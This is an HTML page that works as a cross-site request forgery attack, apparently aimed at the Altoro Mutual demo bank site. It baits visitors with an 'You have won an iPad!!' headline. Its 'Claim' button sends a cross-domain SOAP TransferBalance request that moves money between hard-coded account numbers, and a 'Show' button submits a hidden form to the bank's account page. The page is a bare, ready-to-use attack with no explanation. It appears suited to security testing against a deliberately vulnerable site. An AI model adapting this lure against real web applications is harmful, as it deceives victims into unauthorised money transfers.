<html>
<head>
	<style>
		.myButton {
			-moz-box-shadow:inset 0px -3px 7px 0px #29bbff;
			-webkit-box-shadow:inset 0px -3px 7px 0px #29bbff;
			box-shadow:inset 0px -3px 7px 0px #29bbff;
			background:-webkit-gradient(linear, left top, left bottom, color-stop(0.05, #2dabf9), color-stop(1, #0688fa));
			background:-moz-linear-gradient(top, #2dabf9 5%, #0688fa 100%);
			background:-webkit-linear-gradient(top, #2dabf9 5%, #0688fa 100%);
			background:-o-linear-gradient(top, #2dabf9 5%, #0688fa 100%);
			background:-ms-linear-gradient(top, #2dabf9 5%, #0688fa 100%);
			background:linear-gradient(to bottom, #2dabf9 5%, #0688fa 100%);
			filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#2dabf9', endColorstr='#0688fa',GradientType=0);
			background-color:#2dabf9;
			-moz-border-radius:3px;
			-webkit-border-radius:3px;
			border-radius:3px;
			border:1px solid #0b0e07;
			display:inline-block;
			cursor:pointer;
			color:#ffffff;
			font-family:Arial;
			font-size:15px;
			padding:9px 23px;
			text-decoration:none;
			text-shadow:0px 1px 0px #263666;
		}
		.myButton:hover {
			background:-webkit-gradient(linear, left top, left bottom, color-stop(0.05, #0688fa), color-stop(1, #2dabf9));
			background:-moz-linear-gradient(top, #0688fa 5%, #2dabf9 100%);
			background:-webkit-linear-gradient(top, #0688fa 5%, #2dabf9 100%);
			background:-o-linear-gradient(top, #0688fa 5%, #2dabf9 100%);
			background:-ms-linear-gradient(top, #0688fa 5%, #2dabf9 100%);
			background:linear-gradient(to bottom, #0688fa 5%, #2dabf9 100%);
			filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#0688fa', endColorstr='#2dabf9',GradientType=0);
			background-color:#0688fa;
		}
		.myButton:active {
			position:relative;
			top:1px;
		}

	</style>
	<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>

</head>	

<body>
	<h1>You have won an iPad!!</h1>

	<button class='myButton' onclick="transfer();">Claim</button>
	</br>
	</br>
	<button class='myButton' onclick="show();">Show</button>

	<form id="Form1" method="post" action="http://www.altoromutual.com/bank/account.aspx">
		<input id="listAccounts" value="1001160140" hidden="true">
    </form>
<body>


<script type="text/javascript">

	window.show = function() {
		$("#Form1" ).submit()
	}

	window.transfer = function() {

		var settings = {
			  "async": true,
			  "crossDomain": true,
			  "url": "http://www.altoromutual.com/bank/ws.asmx",
			  "method": "POST",
			  "headers": {
			    "content-type": "text/xml",
			    "accept": "*/*",
			    "accept-language": "en-US,en;q=0.8,hi;q=0.6",
			    "cache-control": "no-cache"
			  },
			  "data": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"\n xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \n xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\n <soap:Body>\n  <TransferBalance xmlns=\"http://www.altoromutual.com/bank/ws/\">\n   <transDetails>\n    <transferDate>2000-01-01</transferDate>\n    <debitAccount>1001160140</debitAccount>\n    <creditAccount>1001160141</creditAccount>\n    <transferAmount>21</transferAmount>\n   </transDetails>\n  </TransferBalance>\n </soap:Body>\n</soap:Envelope>"
			}

		$.ajax(settings).done(function (response) {
		  console.log(response);
		  console.log("Successful transaction")
		});

	}
</script>

</html>